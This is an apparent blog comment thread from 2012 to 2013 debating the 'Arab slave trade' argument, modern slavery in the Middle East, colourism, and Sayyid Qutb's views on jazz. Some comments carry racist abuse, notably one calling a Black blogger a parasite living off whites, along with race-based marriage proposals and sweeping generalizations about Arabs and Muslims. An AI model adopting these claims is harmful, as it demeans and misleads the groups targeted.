The transatlantic slave trade was a disgusting and horrible crime against humanity with repercussions even today. Now that I have said this so no one think im some kind of apologist or something I will get to my point. Because to be honest the main diffrence between the Arab slave trade and the Transatlantic slave trade of black Africans, is that the arab slave trade has actually NEVER stopped. Still happening in Sudan, Saudi Arabia, Yemen Mauretania… it has kept happening (on a smaller scale today of course) and this has been going on for AT LEAST a millenia. (Though most likely around 1400 years) but when you discuss this with an average muslim(black or arab)they completly shut down, you can show them pictures from the FIFTIES with Saudiarabian families with their black slaves and they still go “Allah! everyone is equal in Islam Muhammed is great!!!!!! What about the crusades 800 years ago!!! Christians are just as bad” just the typical deflections And this just shows that in this sad part of history the slavery apologists have succesfully shaped our view of slavery as an only white on black occurance. And even bringing the up the arab slavery in a discussion about slavery can seen as derailong and racist (??) (English is not my native language so my text is perhaps a little badly written but I hope you get my argument)
on Wed Nov 7th 2012 at 15:41:49 oogenhand
On a practical level, Saudi-Arabia is a very tempting target for reparations. It has a lot of stuff, and a Iranian knife to its throat. Hell is eternal.
on Mon Dec 3rd 2012 at 14:42:41 Winslie Gomez
Reblogged this on HAPLOGROUP – bit that makes us human. and commented:
on Mon Dec 3rd 2012 at 15:28:44 The Mind of RD Revilo
Reblogged this on RD Revilo.
on Mon Dec 3rd 2012 at 23:48:57 And now some non-writing stuff | Fraser Sherman's Blog
[…] may sound weird now, but it was commonly expressed back in the day. On a related topic, one blogger rips into the “Well, X may have been bad but he wasn’t as bad as an Arab slave […]
on Thu Dec 6th 2012 at 21:53:30 Ghost
So a white guy, a black guy, and an arab guy assault a black guy. What guys like Macon don’t understand is that if we’re going to be shoveling cultural guilt onto people for crimes like slavery, we have to punish all the involved guilty parties, not just the white ones. Which is why the “arab slave trade” arguement exists: It’s a justified desire to see all parties involved in the crime punished, instead of singling out one group of people because of skin-color.
on Sat Dec 8th 2012 at 09:49:42 oogenhand
Reblogged this on oogenhand and commented:
Abagond correctly applies Judeo-Christian morality. But Dutch tort law would allow whites to demand reparations from arabs for the reparations paid to blacks (“onrechtmatige daad”, “hoofdelijke aansprakelijkheid”).
on Sat Dec 8th 2012 at 18:16:16 GB
Sorry you white-hating racist, but the issue is how the non-white/leftist coalition applies the standards only to whites. The argument isn’t “others do it to” the proper and true argument is “others do it to but only whites get the blame and holding whites to a standard you don’t hold anybody else to is pure hate, pure racism.” You see? Anti-racism is a racist code word for anti-white.
P.S – If we’re so racist just get the hell away from us. You keep whining about how bad you’re treated but you never leave. You’re a parasite who lives off his betters, your income is at least 5 times what it would be if you lived on your own. If you were really our equals in ability you wouldn’t hesitate to go, to set up your own society, even within the U.S., where “white racism” wouldn’t hold you down. I mean, if the things you say are true why would anyone in their right mind would stay and pay to suffer them. They’re not true, they’re the opposite of truth, and that’s why you cling to our legs like a two year old child. “Civil Rights” and “White privilege” and all that other BS are just the plausibly deniable excuses to keep your fingers in white wallets because you know you couldn’t do nearly as well on your own.
on Sat Dec 8th 2012 at 19:17:23 Herneith
@GB:
Hardy har hoo, schnooka schnaw. Put it to music and compose yourself a concerto.
on Sun Dec 30th 2012 at 22:00:35 Barchan
Man your stupid. I never tried to condone or sugarcoat the Transatlantic slave trade. I only said that the Arab slavetrade of Black Africans is still happening extensivly to this date in Saudi arabia, Yemen Sudan Mauretania and no one really cares…. it seems partly because it doesnt really fit the whole ” only the evil white man can be racist” thingy you guys jerk of to…. You have no idea how many times you get the ” its white propaganda” answer when you call someone out people denying arab racism/slavery black Africans….
on Mon Dec 31st 2012 at 19:43:33 Herneith
@Barchan:
It’s ‘off’ not of. Carry on.
on Mon Dec 31st 2012 at 20:32:03 King
@ Ghost
What guys like Macon don’t understand is that if we’re going to be shoveling cultural guilt onto people for crimes like slavery, we have to punish all the involved guilty parties, not just the white ones.
I think that you misunderstand the objections to the use of the Arab Slave trader Argument.
Let’s take you example: So a white guy, a black guy, and an arab guy assault a black guy. OK So let’s say that the Black assaulter runs really fast and evades arrest. And let’s also say that the Arab assaulter is well connected and manages to get released with just a warning. Does the fact that the other two guys beat the rap make the white guy any less guilty of assault?
The problem is that sometimes, when Black people are talking to White people about their own part in the assault, instead of admitting to the injustice of it, will often instead point out that the real injustice is that the other two guys got away and that’s what we should really be talking about!!!!
That is what Abagond is saying here.
on Mon Dec 31st 2012 at 21:24:06 abagond
^^ Amen
on Tue Jan 1st 2013 at 13:06:21 Barchan
Thank you for your constructive criticism! I guess that was the only argument you could find against my text 😛 english is not my native language so unfortunatly I will make some spelling errors now and then, try not to get an ulcer 😛 Yup but the point is that the transatlantic at worst sugarcoated while the transsaharan one is denied sickenly to the point that so few even know that it is still happening and has kept on happening 1600 years at least.
on Tue Jan 1st 2013 at 17:52:15 Linda
“Barchan
Yup but the point is that the transatlantic at worst sugarcoated while the transsaharan one is denied sickenly to the point that so few even know that it is still happening and has kept on happening 1600 years at least.”
I don’t think anyone is denying that a slavery is currently happening in different countries in Africa and Middle East.
What the main point of the post is: the denial and how white society downplays (marginalizes) the transatlantic slave trade and the prosperity and benefits they gained from it and the lengths and evil done in order to maintain it.
There is a VAST difference in the effects and outcome of “intra-slavery” in Africa/middle east from the “trans-Atlantic” slavery and to compare the 2 does an injustice to both!
This is not a case of “everyone did it, still does it” — this is a case of how a dominant white society marginalizes/ likes to diminish their ancestors Part in the tragedy and attempts to not want to take ownership of this lovely part of history — but they (like the rest of us in the so-called 1st world countries) are enjoying the rewards created by the trans-atlantic slave trade.
The world was forever Changed due to the trans-atlantic slave trade and the biggest beneficiaries and Rewards went to white Europeans — not the Arabs and the Africans.
By the time they (arabs/africans) realized their mistake, their partners in crime (the Europeans) double-crossed them and was able to outgun them and started invading / occupying their lands (and Africa is still dealing today with the effects of this “partnership gone wrong”)
Slave labour built US of America into the rich country that is/was — it “shaped” the views of the country and it’s society –just like every other country that had African slave labour….this is the legacy that we all have to deal with until today (unfortunately)
The America’s (north and south) were not the only beneficiaries.
the trans-atlantic slave trade actually changed the world. Colonialism and Imperialism were born and maintained due to the financial prosperity gained from trans-atlantic slavery … without it, Britian would not have gotten rich and would not have been able to dominate the rest of the world for as long as it did.
The trans-atlantic slave trade should Always stand by itself because of the Vastness and abject Evil that surrounded and maintained it — It changed Human history (not just the lives of the enslaved Africans)
Reply to Linda. The arab enslavement of black africans was “Intra slavery” ??? You cannot be serious? All the fucking slave-grabbing JIHAD INCURSIONS into Africa were just some nice calm cultural exchange between so called “People of color” then ??? The fact that slavery started again in Sudan after the brits left(in 1980) because no one was there to hold back the islamist arabs that continued doing what they always did with the “kaffirs/Abds”?…Slaves died at the same extent when being forced to march across the whole fucking Sahara desert towards the slave markets in North Africa or the middle eas, as when they faced horrible conditions abord the european slave ships… “By the time the Arabs realized their mistake” it is hard to take you seriously when you have an idelized view of the arab slavery like that. Yemen made slavery illigal in 1963 for christ sake!! You want to see some nice Saudi Arabian family pictures fro FIFTIES with their Black slaves in the cornors??Mauretania made it formally illegal in 1973. The genocide of black Sudan by arabs?. The list goes on and on. There is nearly zero regrets in the arab world for their enslavement of Black Africans, zero regrets partly because it is never talked about and the few research on the economic effects it has had on North Africa and the middle east. The word Abd(slave) is commonly used for Black Africans and people just look completly indiffrent when you object to them using that term. Slave labour builds Saudi Arabia, Dubai Lebanon Syria to this today but it really isnt that bad when the slaveowners are “people of color” right? And no the world did not “change” when the transatlantic slavetrade began, it was “just” a second horrible step in the exploitation of Africa by non africans, made particulary easy thanks to the extreamly destabilizing effects the countless Jihad incursions against the ” dirty kaffir kingdoms” the arabs were doing in Africa.
I am not in anyway trying to sugarcoat the long lasting effects the transatlantic slave trade has had! I just want to make people realize that just because the Middle East arent as rich in this time from their exploitation of Africa didnt make it any less worse which you seem to think.
Ok im sorry for being a bit fiery with this topic but this denial/sugarcoating of how arabs view black africans is something I have grown up near and how it is all perfect harmony in the “people of color world” crap, and I have several bad expiriences with this here in Sweden from arabs and their views on literally anyone non arab.. And I meant to write that there is “idyllic”family pictures with arabs families in mostly saudiarabian households from s late as the fifties/sixties with their black slaves suffering in the background.
Reply to Linda. The arab enslavement of black africans was “Intra slavery” ??? You cannot be serious? All the fucking slave-grabbing JIHAD INCURSIONS into Africa were just some nice calm cultural exchange between so called “People of color” then ???”
Yes –the word is “Intra” because it’s happening on the African continent by African people. The Arabs in Sudan are still African but since Saudi Arabia is technically not connected to Africa — we can call it international or regional if it makes you feel better.
Like I said to you and I repeat — each deserves to be spoken about and remembered on it’s own merit without being intertwined.
You shouldn’t have to speak about African slavery without diminishing the TransAtltantic slave trade — both Evils stand by themselves and it’s neither should be compared.
on Wed Jan 2nd 2013 at 02:37:05 Linda
By the time the Arabs realized their mistake” it is hard to take you seriously when you have an idelized view of the arab slavery like that. Yemen made slavery illigal in 1963 for christ sake!! ”
Do me a favor and don’t interpret for me — my English is pretty clear and no where in my post do I “Idolize” the Arabs….history is what it is and yeah, I’m sure the Africans/Arabs realized they made a bad “business” deal with the Europeans…they did indeed suffer for it.
It’s nice that you feel “fired” up but let’s not get things twisted — most of us black/brown people of the diaspora on this blog aren’t excusing the Africans or Arabs …what we are discussing is how “white” society likes to excuse their European ancestors and try to play the blame game and downplay the effects and implications of the TransAtlantic slave trade
Slavery is not new — the Europeans enslaved other Europeans, just like how slavery was not new to Africa—but the transAtlantic slave trade took on a significance and life all on its own because of the International Impact it had.
You talking about and trying to compare the the African slave trade to the TransAtlantic slave trade is like apples to oranges, even though the TransAtlantic slave trade originated because of slavery in Africa.
you seem to have a good handle on the modern day African slavery that most of us of the diaspora don’t get a chance to hear about or see…
I would be most interested in hearing more about it, would you consider doing a guest post about it if Abagond is interested?
on Wed Jan 2nd 2013 at 08:21:15 Barchan
“The word intra, because it was happening on the African continent by african peoples” No this is not correct. This is what i meant about Jihad Incursions into Africa FROM the middle east. Simply put, an invading force from another continent (The middle east which is counted into Asia). The first and second Jihads were concentraded from the middle east and was aimed at Africa and Europe. In Europe it managed to concquer the Balkans and large parts of Spain. In Africa it spread across North Africa and later on the western and northern coasts. The things thats similar with the transatlantic slavery is that it was on a whole very race based with an similar hazardous transportation(cramped inhumane cargospaces on the slave ships from western Africa towards America- long hazardus march in chains over the Sahara desert towards the huge slavemarkets in Kairo or even further into the middle east).and yeah, to this date theese brutal pieces of history have shaped white westernes and arabs view of Black Africans. Huh black/brown people? Weird term I say. What i have learned is that there seems to be so few who is aware of the racism in the arab world. The main reason for this is when the north african arab majority countries has now later on tried to build relations with the southern Black African majority countries, they have managed to point exclusivly towards europe and its 400 years of african exploitation and slyly hidden their even longer history of exploitation of Africa (not at all saying what is worse or so but simply that theyve managed to hide such a long history of racism) huh write here :)? Dont think my english is good enough for them to bear with me x) I notice all my errors later on now when I read my old comments . Well Since I know a bit arabic it has been a shocking realization of what a lot of arabs people say. For instance you can check ANY syrian pro Assad page and find Extreamly racist comments about Obama. When they want to a.ttack the “whore americans” they have the wordgame joke “Al abed al-aswad fi al-beit al-abiyad” which I can roughly translate to “The black slave in the white house”. Racist rhymes and jokes like that is common among palistinians(and most arabsk) aswell when they get into their hate america rants like how pathetic they are (white americans) “they now let their slaves rule them” shittalk that really makes me sick. Or that they(white americans) tries to trick them(arabs) by letting “slaves” (black americans) unto high positions of power in USA ( Obama, Colin Powell Condolezza Rice) to make them underestimate them (I really wish I was making this shit up).
I forgot the whole deal with Kofi Annan and his UN pleads that people needs to strife towardss peace in syria. The rebels and military needs to stop killing and so on and he was dismissed in extreamly racist ways on arabic news channels and on facebook groups. … Im really tired of the way to mny black americans have the whole people of color-white people view on arab racism(not accusing anyone on abagond anymore now though!). There was for instance a youtube video on an Ethiopian maid being abused and beaten and driven to suiccide by arab men in lebanon and so many tumblr black american blogs were like ” oh how pity we people of color do that to each other” ” oh white people have damaged us we are fighting each oher now” very annying world view to me…..and btw Linda I dont think we really disagree on much at all, we both just despise racism in any form and im sorry for my angrier tone before! 🙂
on Wed Jan 2nd 2013 at 09:29:41 abagond
@ Barchan
This thread is not about Arab racism or the Arab slave trade. It is about how the Arab slave trade is used to play down or excuse the Western slave trade. White Americans use the Arab slave trade as squid ink to cover their own evil with an “Everyone does it” argument.
To separate the two issues I will do a post on the Arab slave trade, just as I did one on the Transatlantic trade. If you want to point me to any good books or online sources that would be appreciated.
Yup I got that! , Murray Gordon written a really good book called “Slavery in the Arab world” that covers the whole slavery era to date and todays view. Wiji Bohme Shomary has a lot of great texts about her life growing up as dark-skinned in the middle east and she has researched the arab slavery aswell but her articles are mostly in arabic or swedish though…
Thank you! Do you have any thoughts about this book:
Bernard Lewis: “Race and Slavery in the Middle East: An Historical Enquiry” (1990)
http://www.amazon.com/Race-Slavery-Middle-East-Historical/dp/0195053265
I havent read it but reading the description does make me want to order it xD. It seems the whole complexity with islams relation with slavery is discussed in it. Which I find very interresting, the whole “no muslim can enslave another muslim”ideas and the very good and humanistic message Islam has and that “everyone is worth as much before God”. …. AS LONG as your a muslim and not a unfaithful”kaffir” of any other religion, then its not that bad to enslave someone right?… Sigh
Well considering the fact that around 200 000 black sudanese has gotten enslaved by their arab countrymen in the the last 30 years I would understand some resentment between north and south Sudan.
Thanks for the recommendations!
btw Linda I dont think we really disagree on much at all, we both just despise racism in any form and im sorry for my angrier tone before!”
No problem, Barchan, I like your passion…
you have brought some interesting information to the table and I look forward to reading Abagonds post about this topic.
I don’t know much about the subject but I’ve also lived in Europe. I went to university in Germany and I got to meet many different kinds of people.
I can honestly tell you I came away with a love/hate relationship with Spaniards and Italiens, and I did get a small glimpse into the muslim world via my Turkish friends.
As for how Arabs feel about Africans/black people — I can honestly say, I walked away not knowing how to feel. I had different experiences that I would say gave me a small insight but not enough to say “I understand these people”
Because there were so few of us coloured/non-white students living in the town I was in, we all sort of stuck together, so Syrians, Saudi’s, hung with Egyptian, Tunisia, Ivory Coast, Togo, Sudan, etc. even Eritrea hung with Ethiopians (this was the 80’s mind you) — what I learned:
–some of northern Africans called themselves ‘white” even though they were darker than me,
–the Africans did not consider black Americans or any other black from the diaspora to be “Africans”,
–I was called a “unpure” by a few of the central & Southwest Africans because I am mixed-race and they questioned my right to call myself “black”
–Most of the Arabs/Africans spoke at least 3-4 languages minimum (their own, Arabic, and English), majority spoke French and was learning German like I was.
–even if there were disagreements along nationality/ethnic lines–everyone came together if one person was being insulted or threatened by the Europeans (we had a few frisky Italien, Danish and Finnish students who liked to start trouble when drunk)
–as a woman, I would never voluntarily marry or live in an Arabic/muslim country — I like my freedom. ( I had heard stories of Jamaican women who went to work in Saudi Arabia, had their passports taken, and were treated like slaves and beaten. They had to escape to Jamaican embassy and beg for safety)
from this group was the first time I did see the Arab arrogance towards darker-skinned people and I realized there was dislike for some of the Arabs from the African students but I’ll be honest, I never associated it with any historical past or Arab slavery….so you bringing this subject up actually shines a light on this topic.
on Thu Jan 3rd 2013 at 09:15:12 oogenhand
What to think of Salafi plans to blow up Kemetic pyramids? Slavery cannot explain the Arab dislike of dark skin, as they had pale-skinned slaves as well.
on Fri Jan 4th 2013 at 01:08:06 Barchan
Well to be honest when are arabs ever seen as whites (by white people) in any other way than the racial classification in the US? Still otherd into the non-european category by most I would believe. Whites and Arabs have had historical similarities in race relations with other people (mainly Black Africans) though
Yep. Very good examples and as ive said before the most powerful man in the world Barack Obama has been called “Al abed al-aswad fi al-beit al-abiyad”. Or in english “The black slave in the white house” by Syrians and Lebanese (but this racist joke is common throughout the middle east. similar to the contempt racists can have of him in the US. The arab nationalism you write about is very interesting. One similarity ive noticed is the growing fear of each other between white europeans and arabs. The white europeans is starting to fear the growing Islamic faith in Europe and that it brings older gender roles (separate swimming hours in water parks , that has started in immigrant heavy areas is one example, growing numbers of mosques) and the whole war on terror thing Bush stirred up which points suspision towards arabs( in racist ways). While many Arabs feel that European influence is undermining their traditional values (no matter how oppressive they can be towards women and non heteros people) and that they are the victims of aggressive cultural imperialism from the West. Both sides has points but we are heading in a dangerous direction that can escalate REALLY badly if things get out of hand
on Sat Jan 5th 2013 at 02:53:52 Linda
Bulanik@ Linda
I shared a few of your experiences in Germany.
Omg, just harsh and straight out like that. I didn’t like it. It was a learning curve. You know, there was no ‘explaining’ that they’d accept. Just rigid.
Learning curve is the word! Reality check in an inverse way and a little shocking to hear certain things because I was hearing it for the 1st time.
I was also called a “mutt” and so were the few black American students who were there. They were more perplexed than I was because to them, I “was” a mutt for true but they (black Americans) represented what “real” black people looked like –
well, not according to our fellow African students, who also placed them in the same category as me and told us blacks of the diaspora were a “lost” people who were not African.
Mind you, these things were not said in order to hurt us or put us down – these statements came about in discussions that we would have about religion, race, and other current events of the time in Africa and the Middle east….as you said, Rigid –their ethnicity and ancestral name meant a lot to them and was not a fluid thing — it defined who they were.
Seeing the world through their eyes was an eye-opener. The whole “one drop” rule and “Say it loud, I’m black and I’m proud” did not resonate with them – they thought it was a joke
As much as I think Kola Boof is “touched”, many of the African students I met thought along the same lines as she does. Her view on Soledad O’Brien and her “who is Black in America” show:
“A White Woman (Soledad O’Brien) is given the power to DICTATE to Blacks what “blackness” is….she of an Irish name, white skin & everything but the burden.
She is to define an entire race of people from AFRICA based on the 1 drop rule invented by the KKK and we’re supposed to listen to her and not our own continent. It’s so typically arrogant and AMERICAN RACIST.
I have a few drops of TURKISH blood–why can’t I do a “White In America’ tv. special. Explain that
____________________ ______________
Barack Obama just as his Kenyan family taught him is “Half-Caste African Luo” …..he is African, but he is not Black. The other Africans on this thread have told you the same thing. Black is a Color that symbolizes African people—it’s not off white or cream yellow. We don’t accept “kinda black” or “black at certain times of the year” as Black.”
I will post her entire Rant in on the open thread, it’s long and I don’t want to derail this post too much.
Bulanik, I am going to post Kola’s rant on Abagonds “Kola Boof” post instead…better fit rather than clogging up the open thread — it’s long and has profanity — she was very passionate :-), so it will go into moderation
I’ve always thought of the northern Africans, like the Egyptians, as a confused set of people– to me, they represent colourism at it’s finest — they despise dark skin and praise light skin. I am not saying they are black — they are not, they fall into that “brown/other” category just like Hispanics/Latinos in America.
They (Egyptians) are a mixed-race people (and just like most Hispanics/Latinos)refuse to acknowledge their African ancestry even though a good portion of the population have black African mDNA — the Egyptians I knew were the main ones calling themselves “white” —
(is this African denial taught in their schools?) Is it really the Arab influence that made them this way or was it the European/British influence or the many invasions by their southern black African neighbors that made the Egyptians feel this way?
I stumbled across an Egyptian-American writer who touched on this subject concerning how the Egyptians treat the Sudanese refugees (one commenter mentioned how Indonesion and Asian “guest” workers are treated):
The Arab World’s Dirty Secret: Racism
http://www.monaeltahawy.com/blog/?p=93
Living in America or Europe must be a rude awakening for most of them (Arabs/Muslims) — they are in the same boat as “black” people and other minorities and the “white” colour designation they enjoy at home has no real currency outside of African/Middle East.
Their treatment in Europe is not new — it’s just seems like it’s getting worse because the Europeans are being more loud and vocal than ever before.
on Sat Jan 5th 2013 at 07:55:02 oogenhand
“black African mtDNA”
There should be marriage rules (reversed kafa’a) that allow black African men to have Arab wives, but not the other way around.
on Mon Jan 7th 2013 at 21:07:44 sam
When thinking about USA and arabs and how they are seen or were seen before, he is a tip: Paul Anka. Yeap. Lebanese roots. The guy who sang Diana, Put your head on my shoulder, My Hometown, Crazy Love and You are my destiny. So at least in the 50’s being an arab was no obstacle.
on Tue Jan 8th 2013 at 08:04:07 sam
I think we have to remember that muslim arabs propably are seen more alien in USA than christian arabs. When ever we talk about arabs, usually we assume they are muslims, but that is not the case, not even when discussing about the palestinians. There is a quite significant christian minority of palestinians too. And in USA, being a christian (what ever that might be) is traditionally seen as a positive sign.
So if you are an arab, whos complexion is light, and you are an christian, I would imagine that people around you do not recognize your ethnicity, specially if you have changed your name, like it was a custom in the early part of 1900’s up untill 1960’s. So, if you are Jack Arafat instead of Jasser Arafat and go to church every sunday and live a life just like everyone elese around you, most people would not even notice your ancestory.
As for the arab racism, I can not guess what are its origins. I do know that many of them are pretty racist towards blacks, unless in the context of Umma, supposed islamic unity etc. I have no idea how sincere the non-racism is even in islam. If we look at the conflict in Sudan, it was supposedly about the religion and resources, islamic north vs animistic and christian south, but for some reason the north was represented by arab volunteer shock troops etc. and the southern rebels were almost to a man black. So the supposedly religious lines in that conflict followed pretty much the racial and ethnical division too. Yes, there are and were very dark sudanese muslims, but their idea of the southern sudanese people (who were even darker) was pretty much that those were un educated african savages etc.
on Tue Jan 8th 2013 at 08:29:35 oogenhand
But why internalize ideas from the West? They see the West as their cultural opposite.
I do relate to that. Without beard, I am seen as white Dutch. But if I wear a beard, people start talking Arabic to me.
on Wed Jan 9th 2013 at 01:03:47 B. R.
“The American is primitive in his artistic taste, both in what he enjoys as art and in his own artistic works. “Jazz” music is his music of choice. This is that music that the Negroes invented to satisfy their primitive inclinations, as well as their desire to be noisy on the one hand and to excite bestial tendencies on the other. The American’s intoxication in “jazz” music does not reach its full completion until the music is accompanied by singing that is just as coarse and obnoxious as the music itself. Meanwhile, the noise of the instruments and the voices mounts, and it rings in the ears to an unbearable degree… The agitation of the multitude[2] increases, and the voices of approval mount, and their palms ring out in vehement, continuous applause that all but deafens the ears” Sayyid Qutb
No, its near perverse to try to tie in some ideological link with Sayyid “In the Shadow of the Koran” Qutb and the fight against white racism.
“It was as if his own experience of racism as a black man (which was what he appeared to be to ‘proper’, non-Arab whites under the One Drop Rule of that era) was the spark and the explanation behind anti-American elements in parts of the Middle East”
What a pseudo intellectual manipulation of what this guy, and his followers really are about. And a total misrepresentation of their real fundamentalist positions. The visceral truth about what he has said and is , is directly in the racist statement I brought in , taylor made for exactly all I need to know about this sob to know why I despise him and his followers…who really are much more interested in if you are “faithful” or an “infidel” than if you are a white racist.
It also really hits home with a huge authority, exactly the principle Ive been talking about , how, this persons ideology in his fundamental religion, as well as fundamental Christianity or Orthadox Judeism does not accept the real genius and contribution of the Afro Diasporic expresion and its great value.He might as well be Henry Ford, with his referances to bestial tendancies and primitive inclinations . Ha, personaly I dont care if someone on here intellectualy wants to identify with this person’s views and find some kind of connection for themselves with this person and his followers , but, for me, his total disrespect for one of black America’s greatest contributions to the world, and his uptightness with “lavicious behaviour” of women and dancing and music, is all I need to know that these people are my ideological enemies. I love Wesern decadance, my organisation is mixing a monster CD now with plenty of bestial tendancies and primitive inclinations and everyday its got warmth and sun where I live, and I can see women in the most naturaly provocative nudity, or dancing incredible Afro Diasporic dances, with aggresive pelvic thrusts , I am a tremendously greatful individual , for the profound insight and well being it brings to my life.
“The Arab Trader” argument? Yes, as a person here, who has made it clear that I think the slave trade in the Americas was worse than the Arab slave trade,I totaly also feel I can talk with quite frankness about how I feel about the Arab slave trade and how it affected the black Africans who suffered from it…
Yes, I have been a strong supporter of how the legacy of slavery to the Americas affects us all into theh present, and, yes, I have tried with all my might to bring attention on how Brazil is even affected as much as anywhere because of the legacy of the slave trade to the Americas…
so, Im amazed that now , I have been carded on this blog with the Arab Slave trade argument, as well as , no matter if its a discusion about Fake Indians and my son’s right to express himself, or, about Africa 13,000 years, or pointing out Arab racism on an Arab thread, I get pointed out as the “white” “racist” “American” “male” “oppresor”?
Does this mean that in the Arab Trader argument, if I am white, American, male, then that automticly disqualifies me?
on Wed Jan 9th 2013 at 17:04:11 oogenhand
Sound logic. In the end, morality is supranatural in origin.
on Wed Jan 9th 2013 at 17:44:51 Linda
BR, everyone here has butted heads on one subject or another, that’s what makes these discussions lively because there is always a “ying” to someone elses “yang” …try not to take it personally…just shake it off.
The information you brought in on Sayyid Qutb brings balance — which is necessary in these discussions because humans are not one-dimensional creatures —
you just showed that it’s possible to be prejudiced/racist against one group of people while at the same time experiencing prejudiced/racist yourself at the same time from another group (there is always a hierarchy).
You’ve brought into focus another aspect of this topic — which is religion. Was Sayyid Qutb dislike of black Americans religious driven or was it culturally driven because he was Egyptian and they were/are prejudiced against black Africans?
Regardless, he still felt the sting of being marginalized by white Americans for not being what they call “white”…it would be nice to think that he would have learned from this experience and felt compelled to empathize with black Americans
but as you just pointed out, he just internalized his feelings and expressed it as “hatred” of the westerners/infidels while keeping his cultural/racial prejudices intact.
I believe it’s good to show inverse relationships/patterns of behavior in these types of discussions because it shows how the world doesn’t roll on just one set of rules and that people do grow–whether in a good way or bad way — look at Malcolm X – he wasn’t the same man in the end — but what he achieved was profound — it would have been interesting to see where his new found enlightenment would have taken him.
on Thu Jan 10th 2013 at 05:30:02 B. R.
So sorry the truth hurts, Bulanik. Its you who try to casualy bring in Qubt and imply his experiances with racism in America could be some link with some philisophical context in the groups that followed him…bs…you can casualy try to slip his name past readers here who dont know what he stands for , but I do, and people deserve to know that aspect…not your hidden agenda…who do you think you are fooling? The people inspired by his beleifs assasinated one of Egypts great polititions, Anwar Sadat..did you hear what i said? “followed his beleifs”…its his fundamentalist crud that inspires these scum bags to interpret Islam in their way and they kill more people of Islam than the West ever could.
Oh yeah, try your psyche and “its not about you, how did this get to frivilous drumming…” keep showing you dont get it, Bulanik, you never did, Im not surprised you cant tie in how Qubt’s racist remarks about jazz also reflect the more insidious aspects of his fundamentalism. You dont really perceive what jazz is in relationship to its value and its Afro diasporic roots, and how those roots are dismissed, buried, and destroyed BY ALL FUNDIMENTAL RELIGIONS LIKE iSLAM CHRISTIANITY AND JUDISM…
Interesting how you really try to put on me like I am racist against Arabs or Islam when I specificly state its the fundamentalism in all these religions…I SPECIFICLY STATED THAT , LADY…so dont run bs. And hades yes , Im going to point out how you have tried to put me in a trick bag because you cant handle being challenged.About me? Ive been pulling back commentary, based on your bs…yet you think you can slip by some manipulative statement about Qubt , someone I do know about, and Im not going to bring in the truth about his sob fundalmentalism?
Its exactly because I do say the Atlantic slave trade is worse than the Arab slave trade and because I have supported and added to the discusion of how the legacy of slavery still affects society today, that I know I can come in and point out the racism of Qubt , in the face of your diceptive statement about him…and as usual, you try to make me out to be racist or anti Arab.
Linda, just look at Qubt’s remark. Its not even that he doesnt like jazz. “Bestial”? “primitive inclinations”? You may have to think in your head if it is religious or what, I dont, its plain as day exactly where he is coming from…its the same as Henry Ford, and all the other fundamentalist racists that when it gets down to the truth, its that they dont want to recognise some incredible gifts and contributions and what is really the humanity of the exact people who were ripped out of their lives in Africa for slavery in both the Atlantic and Arab slave trade
All I did was bring in some truth…the readers on here can make up their own minds
on Fri Jan 11th 2013 at 11:44:27 B. R.
Bulanik, you have to be kidding me , right? You cant be serious, like I have to step into some kind of grilling by you, on your terms..a person who has slandered me, painting me as a stalker, said I have belittled her as a black woman, called me racist white american oppressor in arguments that have nothing to do with that.
I tell you what, you tell me where i have belittled you as a black woman and Ill answer every point up there…I mean you have incredible recall on posts on this blog, you must have this incident deeply entrenched in your mind exactly where it is , since you claim it traumatised you so much…
As it is, Ill certainly point out some of the most ridiculous questions. Nazi Germany and how they treated jazz? I mean you cant be for real about this, are you? The anwer is so obvious and I included it all ready as I have answered all ready all your questions. I implicated everyone who is fundamentalist and who would make racist statements that would relagate high leval Afro diasporic culture to “bestial sexual promisuous inclinations”….EVERYONE… I said that, do you get it now!! I included Islam, Chritianity, Judism, you think I would give the Nazi’s a pass? You are weird…are all Arabs fundimentalist? Do these fundamentalists represent all Islam? Ask all the people who practice Islam who are slaughtered by these fundamentalists, inspired by Qutb and his ramblings…do you care about them? A bunch were slaughtered this week in Pakistan…by the Taliban, followers of Sayyid’s fundamental philosophies
Al Queeda out to kill black musicians? Really , these questions are extremly foolish. You are the one who actualy begged the question if these groups who were inspired by Sayyid could have some philosophical hook up with anti racism in the USA that Quibt spoke about…in certainly much less detail than American mores…do I think you are a beleiver in Al Queeda’s principles? No, I think you will hide the truth of the whole story for your own agenda that you are on, seething in your own resentments
Do you actualy think his racist remarks against black American culture, only aply to American culture? Do you think his fundamentalist beleifs would give Brazil, and all its unbeleivable sensual culture and Afro Brazilian dances and bestial beats a pass? or the Mambo in Cuba? Or is his fundalmentalism cutting much deeper and seriusly implicating all Afro diasporic cultures that have these beats and dances as the foundation of their cultures…and , do you think Al Queada, or the Taliban, with their restrictions on music , are , in their fundamentalist translation of Islam, giving these cultures a pass? Actualy, you dont have to answer, the answer is already obvious…
I mean seriously, all you have to do is look at the truth in his statements I brought in…I dont have to say anything, its all there. And that is the basis of a strict fundamentalist Islamic aproach to black Afro ( emphasize black African) diasporic culture that relates to beats with dances that are a part of that culture….if you are classifying him “black” and Arabs as “black”, then this group of people who took slaves and the religion that came with the Arabs ( yes, Islam is not representative of all Arabs, but it is the religion that came with the Arabs), then its just an example that a group of “black people” who arent Afro diasporic with Afro diasporic culture, can also enslave and bury other “black peoples ” culture….
Who gets lost in this whole debate, agian, and Ive said it over and over, is the cultural humanity , expresion and the value of the gifts and concepts of the ancient Africans, before Arab or Western enslavement and religious domination
I can only let my black American colleagues read his words and make up their own minds….I never have had an atitude on this blog that “black Americans ought to blah blah…” I can only tell you this, as a jazz musican and a person who works intimitly with Afro diasporic dances and beats, I know only too well what he means, and I have heard it before in great amounts by white racists, white fundamentalists Christians, Nazi’s, bans on sax playing inituaily by Fidel, who gave it up realising how stupid it was, racist Brazilians about Afro Brazilian culture,and all these people are my ideological enemies, and I fight them everyday just living my lifestyle to the fullest
oh just to be more correct , when I say Afro diasporic, Im talking about pre ismlamic or christian sub Sahara black Afro diasporic…Qutb is African
on Sat Jan 12th 2013 at 09:03:01 B. R.
This is absolutly hilarious !!!!!
You think because I used “my black American colleagues”, that it is some kind of “you arnt with them , I am”…blahhhhhhaaaaa
I say black American colleagues in the sence that since we are American citizens , that makes us colleagues…colleagues means I can site this that we have in common and not make Truthbetold obligated to think she has to speak with me….its exactly saying the opisite of what you are implying…Im not asking to be accepted because “I am down”.
And you think because I mention jazz, that is going to be some kind of badge of acceptance in the black American community?
hahahahahahahahahahah this is killing me!!!!!!!!!
